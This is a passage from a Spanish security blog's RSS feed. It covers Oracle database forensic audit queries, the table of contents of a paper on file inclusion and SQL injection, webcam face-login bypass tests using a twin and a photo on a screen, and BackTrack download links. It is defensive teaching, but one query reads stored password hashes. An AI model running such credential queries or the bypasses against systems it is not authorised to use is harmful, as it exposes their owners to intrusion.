href="http://www.dragonjar.org/tag/exploit" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Exploit">exploit</a> AUTH_ALTER_SESSION</p><ul><li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li></ul><p><strong>8).</strong> Consulta de intentos de iniciar una sesiÛn la base de datos a travÈs de XML (XDB)</p><ul><li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li><li>SELECT COMMENT$TEXT FROM SYS.AUD$ WHERE USERID = &#8216;DBSNMP&#8217;;</li><li>SELECT TERMINAL,SPARE1,TIMESTAMP# FROM SYS.AUD$ WHERE USERID=&#8217;DBSNMP&#8217;;</li></ul><p><strong>9).</strong> Consulta si la Auditoria esta habilitada</p><ul><li> SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY ORDER BY SAMPLE_TIME;</li><li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li><li>SELECT USERID,ACTION#,TIMESTAMP#,LOGOFF$TIME FROM AUD$;</li></ul><p><strong>10).</strong> Consulta del archivo sqlnet.log,Agntsrvc.log, spfilesid.ora, o el init.ora todas las ubicaciones referentes a estos parámetros:</p><ul><li>audit_file_dest        &#8212;&#8212;-&gt; <a
href="http://www.dragonjar.org/tag/sistema" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sistema">Sistema</a> de Auditoria (ORACLE_HOME/rdbms/audit)</li><li>background_dump_dest    &#8212;&#8212;-&gt; archivo alert.log y tracer de procesos ($ORACLE_HOME/admin/$ORACLE_SID/bdump)</li><li>core_dump_dest        &#8212;&#8212;-&gt; <a
href="http://www.dragonjar.org/tag/archivos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Archivos">archivos</a> Oracle core dump ($ORACLE_HOME/DBS/)</li><li>db_recovery_file_dest    &#8212;&#8212;-&gt; redo logs, flashback logs, y RMAN backups</li><li>user_dump_dest        &#8212;&#8212;-&gt; Archivos trace debuggin procesos/usuarios (/oracle/utrc)</li><li>utl_file_dir        &#8212;&#8212;-&gt; Especifica uno o m·s directorios que Oracle debe utilizar para PL/SQL archivos E/S.</li><li>control_files        &#8212;&#8212;-&gt; Especifica uno o varios nombres de archivos de control de Oracle</li><li>db_create_file_dest    &#8212;&#8212;-&gt; Especifica la ubicación predeterminada de archivos de datos administrados por Oracle.</li><li>db_create_online_log_dest_n&#8212;-&gt; Especifica la ubicación de los redo logs y file control</li><li>log_archive_dest    &#8212;&#8212;-&gt; Es aplicable solo si la BD esta en modo de ARCHIVELOG</li><li>log_archive_dest_n    &#8212;&#8212;-&gt; Define hasta 10 archivos de registros logs.</li></ul><p><strong>11).</strong> Consulta de archivos Log Listener (ORACLE_HOME/network/admin/listener.ora) (lsnrctl status me dara la ubicación actual)</p><p><strong>12).</strong> Revisión de los LOGS de sentencias(SQL $ORACLE_HOME/bin/LOGIN.SQL,$ORACLE_HOME/dbs/LOGIN.SQL,$ORACLE_HOME/SQLPlus/admin/glogin.sql)</p><p><strong>13).</strong> Consultando informacion de los inicios de Sesion:</p><ul><li>SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY</li></ul><p><strong>14).</strong> Consultar una lista de usuarios y roles, usuarios con función de DBA, para buscar inconsistencias,o usuarios creados por un atacante y la generación de contraseñas fuertes con la validación de los hash, cuentas bloqueadas, tiempos de password</p><ul><li>SELECT USER#, NAME, ASTATUS, PASSWORD, CTIME, PTIME, LTIME FROM SYS.USER$ WHERE TYPE#=1;</li><li>SELECT U.NAME AS &#8220;GRANTEE&#8221;, U2.NAME AS &#8220;ROLE&#8221; FROM SYS.USER$ U,SYS.USER$ U2, SYS.SYSAUTH$ A WHERE U.USER# = A.GRANTEE# AND PRIVILEGE# = U2.USER#;</li></ul><p><strong>15).</strong> Consultar una lista de objetos y privilegios en el sistema</p><ul><li>SELECT U.NAME AS &#8220;GRANTEE&#8221;, P.NAME AS &#8220;PRIVILEGE&#8221;, U2.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;OBJECT&#8221; FROM SYS.USER$ U, SYS.USER$ U2,SYS.TABLE_PRIVILEGE_MAP P, SYS.OBJ$ O, SYS.OBJAUTH$ A WHERE U.USER# =A.GRANTEE# AND A.OBJ# = O.OBJ# AND P.PRIVILEGE = A.PRIVILEGE# AND O.OWNER#=U2.USER#;</li><li>SQL&gt; SELECT OBJ#, OWNER#, NAME, TYPE#, CTIME, MTIME, STIME FROM SYS.OBJ$ ORDER BY CTIME ASC;</li></ul><p><strong>16).</strong> Consulta de tablas eliminadas</p><ul><li>SELECT U.NAME, R.ORIGINAL_NAME, R.OBJ#, R.DROPTIME, R.DROPSCN FROM SYS.RECYCLEBIN$ R, SYS.USER$ U WHERE R.OWNER#=U.USER#;</li></ul><p><strong>17).</strong> Consulta de Directorios, archivos datos, archivos externos, tablas externas, buscando elementos perdidos o ubicados en sitios diferentes por el atacante.</p><ul><li>SELECT T.NAME AS &#8220;TABLESPACE&#8221;, D.NAME AS &#8220;FILNAME&#8221; FROM V$DATAFILE D, TS$ T WHERE T.TS#=D.TS#;<br
/> SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;DIRECTORY&#8221;, D.OS_PATH AS &#8220;PATH&#8221; FROM SYS.OBJ$ O, SYS.USER$ U, SYS.DIR$ D WHERE U.USER#=O.OWNER# AND O.OBJ#=D.OBJ#;</li><li>SELECT O.NAME, D.DEFAULT_DIR FROM SYS.OBJ$ O, SYS.EXTERNAL_TAB$ D WHERE D.OBJ# = O.OBJ#;</li></ul><p><strong>18).</strong> El Monitor del Sistema (SMON) MON_MOD$ Table</p><ul><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;OBJECT&#8221;, M.OBJ#, M.INSERTS,M.UPDATES, M.DELETES, M.TIMESTAMP FROM SYS.MON_MODS$ M, SYS.USER$ U,SYS.OBJ$ O WHERE O.OBJ#=M.OBJ# AND U.USER#=O.OWNER#;</li></ul><p><strong>19).</strong> Revision de Triggers al encendido, apagado, inicio y terminacion de sesion</p><ul><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221;,DECODE(T.TYPE#, 0, &#8216;BEFORE&#8217;,2, &#8216;AFTER&#8217;,'NOTSET&#8217;) AS &#8220;WHEN&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1;</li><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,1) = 1;</li><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,2) = 2;</li><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,8) = 8;</li><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,16) = 16;</li></ul><p><strong>20).</strong> Consulta de librerias, que puedan estar ejecutando codigo arbitrario(malicioso)</p><ul><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;LIBRARY&#8221;, L.FILESPEC AS &#8220;PATH&#8221; FROM SYS.LIBRARY$ L, SYS.USER$ U, SYS.OBJ$ O WHERE O.OBJ#=L.OBJ# AND O.OWNER#=U.USER#;</li></ul><p><strong>21).</strong> Consultas de FlashBack (nuevos privilegios, derechos asignados, nuevos objetos, objetos eliminados) entre la tabla actual y la anterior en un tiempo determinado.</p><ul><li>SELECT GRANTEE#, PRIVILEGE# FROM SYS.SYSAUTH$ MINUS SELECT GRANTEE#, PRIVILEGE# FROM SYS.SYSAUTH$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8217;3600&#8242; MINUTE);</li><li>SELECT NAME FROM SYS.OBJ$ MINUS SELECT NAME FROM SYS.OBJ$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8217;156&#8242; MINUTE);</li><li>SELECT NAME FROM SYS.OBJ$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8217;156&#8242; MINUTE) MINUS SELECT NAME FROM SYS.OBJ$;</li></ul><p><strong>22).</strong> Consulta de las tablas RECYLEBIN$ y OBJ$</p><ul><li>SQL&gt; SELECT MTIME, NAME, OWNER#, OBJ# FROM SYS.OBJ$ WHERE NAME LIKE &#8216;BIN$%&#8217;;</li></ul><p><strong>23).</strong> Consultas la Administracion automatica Deshacer ( UNDOTBS01.DBF)</p><ul><li>SELECT SEGMENT_NAME,HEADER_FILE,HEADER_BLOCK,EXTENTS,BLOCKS FROM DBA_SEGMENTS WHERE SEGMENT_NAME LIKE &#8216;_SYSSMU%$&#8217;;</li></ul><p><strong>24).</strong> Consulta de los logs del Apache (Oracle Application <a
href="http://www.dragonjar.org/tag/server" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Server">Server</a>)</p><p><strong>25). </strong>¿faltó algo? háznoslo saber en los comentarios.</p><p><strong>Actualizado:</strong><br
/> El usuario coco, <a
href="http://www.megaupload.com/?d=A7ATMXMD">nos comparte una serie de scripts que utiliza en su trabajo para auditar su base de datos oracle</a>, puedes basarte en ellos para auditar tu propia DB de oracle.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/seguridad-informatica-un-reto-para-la-ingenieria-del-software-o-una-necesidad.xhtml" title="Seguridad Informática, un reto para la Ingeniería del Software o una necesidad">Seguridad Informática, un reto para la Ingeniería del Software o una necesidad</a></li><li><a
href="http://www.dragonjar.org/nueva-clase-de-vulnerabilidad-en-bases-de-datos-sql.xhtml" title="Nueva Clase de Vulnerabilidad en Bases de Datos SQL">Nueva Clase de Vulnerabilidad en Bases de Datos SQL</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-de-seguridad-y-redes-en-el-sena-virtual.xhtml" title="Curso Gratis de Seguridad y Redes en el Sena Virtual">Curso Gratis de Seguridad y Redes en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/wifiway-2-0-1.xhtml" title="WifiWay 2.0.3 FINAL">WifiWay 2.0.3 FINAL</a></li><li><a
href="http://www.dragonjar.org/laboratorio-practico-de-auditoria-y-pentest.xhtml" title="Laboratorio Práctico de Auditoria y Pentest">Laboratorio Práctico de Auditoria y Pentest</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml" title="Repositorio con Herramientas de Seguridad">Repositorio con Herramientas de Seguridad</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Vulnerabilidades Web que Permiten Acceder al Sistema</title><link>http://www.dragonjar.org/vulnerabilidades-web-que-permiten-acceder-al-sistema.xhtml</link> <comments>http://www.dragonjar.org/vulnerabilidades-web-que-permiten-acceder-al-sistema.xhtml#comments</comments> <pubDate>Sat, 01 Nov 2008 04:37:45 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Acceder]]></category> <category><![CDATA[Shell]]></category> <category><![CDATA[sistema]]></category> <category><![CDATA[Vulnerabilidades]]></category> <category><![CDATA[Web]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1402</guid> <description><![CDATA[Pepelux miembro del grupo eNYe-sec ha publicado un documento en el que nos muestras las vulnerabilidades web mas populares que permiten acceso remoto a un sistema. El contenido del paper es.. 1 &#8211; Introducción 2 &#8211; Local y Remote File Inclusion (LFI/RFI) 2.1 &#8211; Introducción 2.2 &#8211; Ejecutando comandos remotamente 2.2.1 &#8211; Inyectando código PHP [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://www.enye-sec.org/pepelux" target="_blank">Pepelux</a> miembro del grupo eNYe-sec ha publicado un documento en el que nos muestras las <a
href="http://www.dragonjar.org/tag/vulnerabilidades" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidades">vulnerabilidades</a> <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> mas populares que permiten acceso remoto a un <a
href="http://www.dragonjar.org/tag/sistema" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sistema">sistema</a>.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img519.imageshack.us/img519/2190/parperkr8.jpg" alt="parperkr8 Vulnerabilidades Web que Permiten Acceder al Sistema"  title="Vulnerabilidades Web que Permiten Acceder al Sistema" /></p><p>El contenido del paper es..</p><p>1 &#8211; Introducción</p><p>2 &#8211; Local y Remote File Inclusion (LFI/RFI)<br
/> 2.1 &#8211; Introducción<br
/> 2.2 &#8211; Ejecutando comandos remotamente<br
/> 2.2.1 &#8211; Inyectando código PHP en los logs de apache<br
/> 2.2.2 &#8211; Inyectando código PHP en la tabla de procesos<br
/> 2.2.3 &#8211; Inyectando código PHP en una imagen<span
id="more-1402"></span><br
/> 2.2.4 &#8211; Inyectando código PHP en los ficheros de sesiones<br
/> 2.2.5 &#8211; Inyectando código PHP en otros <a
href="http://www.dragonjar.org/tag/archivos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Archivos">archivos</a><br
/> 2.3 &#8211; Obteniendo una <a
href="http://www.dragonjar.org/tag/shell" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Shell">shell</a><br
/> 2.4 &#8211; Remote File Inclusión</p><p>3 &#8211; Blind <a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">SQL</a> Injection<br
/> 3.1 &#8211; Introducción<br
/> 3.2 &#8211; Cargando ficheros locales<br
/> 3.3 &#8211; Obteniendo datos sin fuerza bruta<br
/> 3.4 &#8211; Ejecutando comandos remotamente<br
/> 3.5 &#8211; Obteniendo una shell</p><p>4 &#8211; Referencias</p><p><a
href="http://www.4shared.com/file/69442659/c633d22f/Vulnerabilidades_web_que_permiten_acceder_al_sistema.html ">Descargar Paper</a><br
/> <a
href="http://www.enye-sec.org/">Ver Anuncio en Pagina Oficial</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/webraider-explotacion-automatizada-de-aplicaciones-web.xhtml" title="WebRaider &#8211; Explotación automatizada de aplicaciones Web">WebRaider &#8211; Explotación automatizada de aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/como-descubrir-vulnerabilidades-y-escribir-exploits.xhtml" title="Cómo descubrir vulnerabilidades y escribir exploits">Cómo descubrir vulnerabilidades y escribir exploits</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/cupos-disponibles-en-el-sena.xhtml" title="Cupos disponibles en el SENA">Cupos disponibles en el SENA</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/skipfish-escaner-seguridad-para-aplicaciones-web.xhtml" title="Skipfish, escáner de seguridad para aplicaciones web">Skipfish, escáner de seguridad para aplicaciones web</a></li><li><a
href="http://www.dragonjar.org/wapiti-escaner-vulnerabilidades-aplicaciones-web.xhtml" title="Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web">Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/vulnerabilidades-web-que-permiten-acceder-al-sistema.xhtml/feed</wfw:commentRss> <slash:comments>11</slash:comments> </item> <item><title>Poniendo a Prueba un Sistema de Autentificación Biométrica</title><link>http://www.dragonjar.org/poniendo-a-prueba-un-sistema-de-autentificacion-biometrica.xhtml</link> <comments>http://www.dragonjar.org/poniendo-a-prueba-un-sistema-de-autentificacion-biometrica.xhtml#comments</comments> <pubDate>Sat, 23 Jun 2007 22:32:28 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[Autentificación]]></category> <category><![CDATA[Biométrica]]></category> <category><![CDATA[Pruebas]]></category> <category><![CDATA[sistema]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=929</guid> <description><![CDATA[En un pasado artículo titulado Protección Biométrica al Alcance de Todos les comentaba sobre el software Banana Screen . Software que permite implementar en cualquier computador este tipo de protección (biométrica) mediante la utilización de una webcam. He realizado una serie de pruebas a este software para determinar su fiabilidad y eficacia, estos son los [...]]]></description> <content:encoded><![CDATA[<p>En un pasado artículo titulado <a
title="Enlace Permanente a " rel="bookmark" href="http://www.dragonjar.us/proteccion-biometrica-al-alcance-de-todos.xhtml" target="_blank">Protección Biométrica al Alcance de Todos</a> les comentaba sobre el software <a
title="BananaScreen BananaSecurity" href="http://www.dragonjar.us/proteccion-biometrica-al-alcance-de-todos.xhtml" target="_blank">Banana Screen</a> . Software que permite implementar en cualquier computador este tipo de protección (<a
href="http://www.dragonjar.org/tag/biometrica" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Biométrica">biométrica</a>) mediante la utilización de una webcam.</p><p>He realizado  una serie de <a
href="http://www.dragonjar.org/tag/pruebas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Pruebas">pruebas</a> a este software para determinar su fiabilidad y eficacia,  estos son los resultados:</p><h2>Prueba de Acceso Normal</h2><p>El <a
href="http://www.dragonjar.org/tag/sistema" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sistema">sistema</a> de <a
href="http://www.dragonjar.org/tag/autentificacion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Autentificación">autentificación</a> se pondrá a prueba en circunstancias normales, con un usuario autentico y uno que no lo es, en este ambiente el software BonanaScreen se comportó como se espera e impidió el acceso del pc al usuario no autorizado.</p><p>BananaScreen<span
style="color: #008000;"><strong> SUPERÓ</strong></span> la Prueba de Acceso Normal.</p><h2>Prueba de Gemelos</h2><p
style="text-align: center;"><img
title="Prueba Gemelos" src="http://farm2.static.flickr.com/1306/890410036_cda051b1fa_o.jpg" alt="890410036 cda051b1fa o Poniendo a Prueba un Sistema de Autentificación Biométrica"  /><span
id="more-929"></span></p><p>Ahora pondremos a prueba el BananaScreen en circunstancias poco normales, se evaluara la efectividad del software BananaScreen cuando la persona que hace uso del sistema tiene un gemelo idéntico.</p><p
style="text-align: center;"><img
title="Login" src="http://farm2.static.flickr.com/1212/890410092_63146697a9.jpg" alt="890410092 63146697a9 Poniendo a Prueba un Sistema de Autentificación Biométrica"  /></p><p>Registrando al primer gemelo como usuario ÚNICO del computador.</p><p
style="text-align: center;"><img
title="Los 2 gemelos" src="http://farm2.static.flickr.com/1087/890410104_523fcc8902.jpg" alt="890410104 523fcc8902 Poniendo a Prueba un Sistema de Autentificación Biométrica"  /></p><p>Ahora el gemelo 2 (de <strong><span
style="color: #3366ff;">azul</span></strong>) tratará de <a
href="http://www.dragonjar.org/tag/acceder" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Acceder">acceder</a> al computador del gemelo 1 (de <strong><span
style="color: #ff0000;">rojo</span></strong>) quien se supone es el único que puede entrar en el.</p><p><strong>Resultado de la prueba de gemelos:</strong></p><p>BananaScreen <strong><span
style="color: #ff0000;">FALLÓ</span></strong>, no diferenció entre un gemelo y otro, permitió el acceso del <strong>gemelo 2</strong> al computador del <strong>gemelo 1.</strong></p><h2>Prueba de Acceso con Foto</h2><p
style="text-align: center;"><img
title="Prueba de acceso con foto" src="http://farm2.static.flickr.com/1124/890410140_9af61044ee.jpg" alt="890410140 9af61044ee Poniendo a Prueba un Sistema de Autentificación Biométrica" width="500" height="375" /></p><p>Después de las anteriores pruebas ahora realizaremos una con una fotografía del usuario autorizado intentando tener acceso al sistema.</p><p>Esta prueba fue <strong><span
style="color: #008000;">SUPERADA </span></strong>por el BananaScreen y denegó el acceso al usuario no autorizado.</p><h2>Prueba de Acceso con Foto</h2><h3>(en pantalla de cámara digital)</h3><p
style="text-align: center;"><img
src="http://farm2.static.flickr.com/1334/890410110_cedcfcc303_o.jpg" alt="890410110 cedcfcc303 o Poniendo a Prueba un Sistema de Autentificación Biométrica" width="480" height="640" title="Poniendo a Prueba un Sistema de Autentificación Biométrica" /></p><p>Esta es una prueba curiosa, después de realizar la de la foto impresa se tomo una foto en la cámara digital (8mp) y se puso la pantalla con la foto frente a la webcam y después de unos 30 intentos el sistema permitió el acceso al sistema.</p><p>Aunque la foto debe ser como la expuesta aquí (bueno no así de fea <img
src="http://www.dragonjar.us/wp-includes/images/smilies/icon_biggrin.gif" alt="icon biggrin Poniendo a Prueba un Sistema de Autentificación Biométrica"  title="Poniendo a Prueba un Sistema de Autentificación Biométrica" /> ), así que una foto de lejos no es valida (punto a favor).</p><p>En esta prueba también <span
style="font-weight: bold; color: #ff0000;">FALLÓ</span> el BananaScreen aunque con mucha mas dificultad finalmente se obtuvo acceso al sistema.</p><p
style="font-weight: bold;">CONCLUSIONES:</p><p>Aunque algunas de las pruebas no fueron superadas por el BananaScreen hay que tener en cuenta que fue puesto a situaciones <span
style="font-weight: bold;">POCO NORMALES </span>y que el software BananaScreen aun esta en <span
style="font-weight: bold;">BETA</span> sigue siendo una buena alternativa para quienes olvidan continuamente sus contraseñas (y no tienen un gemelo).</p><p
style="font-weight: bold;" align="center"><span
style="color: #ff0000;">¿Que opinas de </span><span
style="color: #008000;">estos resultados?</span></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/osstmm-open-source-security-testing-methodology-manual-3-0.xhtml" title="OSSTMM (Open Source Security Testing Methodology Manual) 3.0">OSSTMM (Open Source Security Testing Methodology Manual) 3.0</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml" title="Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad">Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad</a></li><li><a
href="http://www.dragonjar.org/snapshot-en-debian.xhtml" title="Snapshot en Debian">Snapshot en Debian</a></li><li><a
href="http://www.dragonjar.org/video-introduccion-al-metasploit-framework-2.xhtml" title="Vídeo: Introducción al Metasploit Framework">Vídeo: Introducción al Metasploit Framework</a></li><li><a
href="http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml" title="Fallo en FreeBSD permite obtener root">Fallo en FreeBSD permite obtener root</a></li><li><a
href="http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml" title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?">¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</a></li><li><a
href="http://www.dragonjar.org/nueva-version-del-caine-livecd-para-informatica-forense.xhtml" title="Nueva Versión del CAINE, LiveCD para Informática Forense ">Nueva Versión del CAINE, LiveCD para Informática Forense </a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/poniendo-a-prueba-un-sistema-de-autentificacion-biometrica.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>BackTrack 4.0 FINAL</title><link>http://www.dragonjar.org/por-fin-backtrack-20-final.xhtml</link> <comments>http://www.dragonjar.org/por-fin-backtrack-20-final.xhtml#comments</comments> <pubDate>Sat, 10 Mar 2007 07:24:11 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[General]]></category> <category><![CDATA[BackTrack]]></category> <category><![CDATA[GNU/Linux]]></category> <category><![CDATA[Herramientas]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[Seguridad Informática]]></category> <category><![CDATA[sistema]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=770</guid> <description><![CDATA[YA Puedes descargar el BackTrack v5.0 Final Click AQUÍ Ya salio la versión 2.0 final del BackTrack tiene grandes cambios especialmente en el tema de la seguridad wireless e incluya nuevos drivers que permiten inyección de código. Los Nuevos Drivers son: madwifi-ng (Patched for Injection) hostap (Patched for Injection) prism54 (Patched for Injection) bcm43xx (Patched [...]]]></description> <content:encoded><![CDATA[<h2 style="text-align: center;"><a
title="Enlace permanente a BackTrack v5.0 Final" href="../backtrack-5.xhtml" rel="bookmark">YA Puedes descargar el BackTrack v5.0 Final Click AQUÍ</a></h2><p>Ya salio la versión 2.0 final del <a
href="http://www.dragonjar.org/tag/backtrack" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con BackTrack">BackTrack</a> tiene grandes cambios especialmente en el tema de la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> wireless e incluya nuevos drivers que permiten inyección de código.</p><p
style="text-align: center;"><p>Los Nuevos Drivers son:</p><ul><li>madwifi-ng (Patched for Injection)</li><li>hostap (Patched for Injection)</li><li>prism54 (Patched for Injection)</li><li>bcm43xx (Patched for Injection)</li><li>rtl8180 (Patched for Injection)</li><li>rtl8187 (Patched for Injection)</li><li>ipw2200 (Patched for Injection)</li><li>rt2570 (ASPj’s Drivers)</li><li>rt2500</li><li>rt61</li><li>rt73</li><li>ipw2100</li><li>ipw3945</li><li>acx100</li><li>zd1211rw</li></ul><p
style="text-align: center;"><h1 style="text-align: center;">DESCARGAR GRATIS BACKTRACK 2.0 FINAL</h1><h2><span
class="dark">Mirror 1 </span></h2><p>&nbsp;</p><p><a
href="http://mirror.switch.ch/ftp/mirror/backtrack/bt2final.iso">http://mirror.switch.ch/ftp/mirror/backtrack/bt2final.iso</a></p><p><strong>MD5:</strong> 990940d975f13d8418b0daa175560ae0</p><p><a
href="ftp://mirror.switch.ch/mirror/backtrack/bt2final.iso">ftp://mirror.switch.ch/mirror/backtrack/bt2final.iso</a></p><p><strong>MD5:</strong> 990940d975f13d8418b0daa175560ae0</p><h2><span
class="dark">Mirror 2 </span></h2><p>&nbsp;</p><p><a
href="ftp://swtsrv.informatik.uni-mannheim.de/pub/linux/distributions/BackTrack/bt2final.iso">ftp://swtsrv.informatik.uni-mannheim.de/pub/linux/distributions/BackTrack/bt2final.iso</a></p><p><strong>MD5:</strong> 990940d975f13d8418b0daa175560ae0</p><h2><span
class="dark">Mirror 3 </span></h2><p>&nbsp;</p><p><a
href="http://ftp.belnet.be/packages/backtrack/bt2final.iso">http://ftp.belnet.be/packages/backtrack/bt2final.iso</a></p><p><strong>MD5:</strong> 990940d975f13d8418b0daa175560ae0</p><p><a
href="ftp://ftp.belnet.be/packages/backtrack/bt2final.iso">ftp://ftp.belnet.be/packages/backtrack/bt2final.iso</a></p><p><strong>MD5:</strong> 990940d975f13d8418b0daa175560ae0</p><div><h2><span
class="dark">Torrent<br
/> </span></h2></div><h2><span
class="dark"><a
href="http://www.demonoid.com/files/download/HTTP/1052984/6746204">http://www.demonoid.com/files/download/HTTP/1052984/6746204</a> </span></h2><p><strong>MD5:</strong> 990940d975f13d8418b0daa175560ae0</p><p>&nbsp;</p><h1>Actualizado:</h1><p><a
href="http://www.dragonjar.org/backtrack-3-beta.xhtml">Ya esta disponible la version beta del BackTrack 3</a></p><p>1173562913</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/backtrack-5.xhtml" title="BackTrack 5">BackTrack 5</a></li><li><a
href="http://www.dragonjar.org/multiples-distribuciones-de-seguridad-en-tu-usb-con-katana.xhtml" title="Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB">Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB</a></li><li><a
